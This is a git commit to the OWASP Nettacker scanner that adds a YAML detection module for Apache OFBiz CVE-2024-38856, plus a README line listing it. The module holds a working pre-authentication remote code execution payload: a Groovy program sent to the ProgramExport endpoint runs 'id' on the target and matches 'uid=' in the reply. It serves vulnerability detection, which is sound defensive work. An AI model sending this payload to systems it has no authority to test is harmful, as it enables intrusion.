Apache OFBiz CVE-2024-38856 module

This commit is contained in:
Sam Stepanyan 2024-08-30 23:19:03 +01:00
parent 8c86f6239b
commit b44218bf7a
2 changed files with 54 additions and 0 deletions

View File

@ -123,6 +123,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
## Vuln Modules ## Vuln Modules
* '**apache_ofbiz_cve_2024_38856**' - check the target for Apache OFBiz CVE-2024-38856
* '**apache_struts_vuln**' - check Apache Struts for CVE-2017-5638 * '**apache_struts_vuln**' - check Apache Struts for CVE-2017-5638
* '**Bftpd_double_free_vuln**' - check bftpd for CVE-2007-2010 * '**Bftpd_double_free_vuln**' - check bftpd for CVE-2007-2010
* '**Bftpd_memory_leak_vuln**' - check bftpd for CVE-2017-16892 * '**Bftpd_memory_leak_vuln**' - check bftpd for CVE-2017-16892

View File

@ -0,0 +1,53 @@
info:
name: apache_ofbiz_cve_2024_38856_vuln
author: OWASP Nettacker Team
severity: 9.8
description: CVE-2024-38856 Apache OFBiz Unauthenticated endpoint could allow execution of screen rendering code
reference:
- https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
- https://www.cisa.gov/news-events/alerts/2024/08/27/cisa-adds-one-known-exploited-vulnerability-catalog
- https://issues.apache.org/jira/browse/OFBIZ-13128
profiles:
- vuln
- vulnerability
- http
- critical_severity
- cve
- apache
- apache_ofbiz
- cisa_kev
payloads:
- library: http
steps:
- method: post
timeout: 3
headers:
User-Agent: "{user_agent}"
allow_redirects: false
ssl: false
url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
prefix: ""
suffix: ""
interceptors:
data:
paths:
- "webtools/control/forgotPassword/ProgramExport?groovyProgram=throw+new+Exception('id'.execute().text)"
schema:
- "http"
- "https"
ports:
- 80
- 443
response:
condition_type: and
conditions:
status_code:
regex: "200"
reverse: false
content:
regex: java\.lang\.Exception\:\suid\=
reverse: false